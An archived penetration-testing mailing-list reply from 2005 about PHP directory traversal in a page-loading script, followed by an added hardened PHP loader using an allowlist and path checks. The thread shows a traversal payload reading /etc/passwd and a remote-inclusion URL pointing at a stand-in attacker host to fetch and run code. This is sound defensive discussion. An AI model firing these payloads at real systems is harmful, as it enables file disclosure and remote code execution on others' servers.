Penetration Testing mailing list archives
Re: PHP Directory Transversal
From: John GALLET <john.gallet () wanadoo fr>
Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET)
Hi there,
Therefore, I tried doing a www.example.com/static.php?page=../../../../../../etc/passwd but I get an error saying that file doesn't exist. I use the same source code in my server, and I could retrieve the file...what can be happening? I don't think it is under a chroot jail...
What you can or can not read depends on the configuration of php (include_path vs safe mode for example). Have a look at: http://fr3.php.net/features.safe-mode

Now the real risk is not so much reading some source code as executing some other people's code. www.example.com/static.php?page=http://evilcracker.com/evil_code.txt has good chances of also getting executed, which opens the path to install any backdoor, download perl scripts/trojans, etc...

HTH
JG
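Added example, not part of the original message or thread: a hardened page loader for a script like static.php, closing both the traversal and the remote-include path described above. It assumes the script passed the `page` parameter straight to `include()`, which the thread does not show; `PAGES_DIR`, `PAGES` and `resolve_page()` are hypothetical names.

```php
<?php
// Added example: hardened page loader for a script like static.php.
// Assumption: the original script did something like
//     include($_GET['page']);   // vulnerable pattern, shown for contrast only
// so any path or URL in ?page= reached include() unchanged.

// Hypothetical directory holding the only files this script may serve.
const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: request value => file on disk. Nothing taken from the
// request is ever used to build a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested): ?string
{
    // Reject arrays (?page[]=x) and any value that is not an allowlist key.
    // "../../etc/passwd" and "http://..." both fail here.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }

    // Defence in depth: the resolved file must exist and sit inside
    // PAGES_DIR after symlinks and ".." segments are resolved.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['page'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

At the configuration level, `allow_url_include = Off` and an `open_basedir` restriction in php.ini act as backstops for any include that escapes review. Safe mode, mentioned in the reply, was removed in PHP 5.4 and is not available on current versions.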